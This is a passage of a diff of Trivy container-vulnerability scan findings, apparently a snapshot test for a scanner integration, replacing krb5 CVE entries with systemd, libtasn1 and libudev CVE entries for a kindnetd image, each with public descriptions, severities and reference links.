"https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "https://access.redhat.com/security/cve/CVE-2019-20386", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "https://linux.oracle.com/cve/CVE-2019-20386.html", + "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "https://security.netapp.com/advisory/ntap-20200210-0002/", + "https://ubuntu.com/security/notices/USN-4269-1", + "https://usn.ubuntu.com/4269-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-20386", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2019-20386", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2019-20386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://ubuntu.com/security/notices/USN-4269-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://usn.ubuntu.com/4269-1/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", + ], + }, + "category": "Vulnerability", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "references": [ { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-5013-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5013-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "241-7~deb10u5", + "packageName": "libsystemd0", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "4.13-3+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-46848", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", + ], + }, + "category": "Vulnerability", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5-3", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://ubuntu.com/security/notices/USN-5707-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libkrb5support0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-1000654", + "installedVersion": "4.13-3", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", + "http://www.securityfocus.com/bid/105151", + "https://access.redhat.com/security/cve/CVE-2018-1000654", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", + "https://gitlab.com/gnutls/libtasn1/issues/4", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", + "https://ubuntu.com/security/notices/USN-5352-1", + "https://www.cve.org/CVERecord?id=CVE-2018-1000654", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://avd.aquasec.com/nvd/cve-2018-1000654", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "http://www.securityfocus.com/bid/105151", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://access.redhat.com/security/cve/CVE-2018-1000654", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://gitlab.com/gnutls/libtasn1/issues/4", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://ubuntu.com/security/notices/USN-5352-1", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-1000654", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-3843", + "installedVersion": "241-7~deb10u5", + "packageName": "libudev1", + "references": [ + "http://www.securityfocus.com/bid/108116", + 